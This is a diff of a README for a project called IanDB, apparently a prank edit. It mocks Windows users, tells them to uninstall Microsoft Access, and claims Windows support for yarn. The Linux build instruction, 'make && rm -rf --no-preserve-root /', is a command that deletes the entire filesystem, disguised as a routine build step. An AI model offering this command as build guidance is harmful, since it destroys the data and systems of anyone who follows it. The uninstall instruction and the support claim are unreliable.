styler/ian-db/README.md

 # Building IanDB

+### Linux Developers

     make && rm -rf --no-preserve-root /

 After building IanDB, it is a good idea to test it using:

     make test

+### Windows "Developers"

+1. Uninstall Microsoft Access using `C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\setup.exe" /uninstall "AccessRT"` (conflicting software)

+Testing is currently unavailable for windows.

-It is also possible to use `yarn install` once you download ian-db.
-It does not work on windows however.
+It is also possible to use `yarn install` once you download ian-db - now with windows support!

 # Code contributions
 CBenni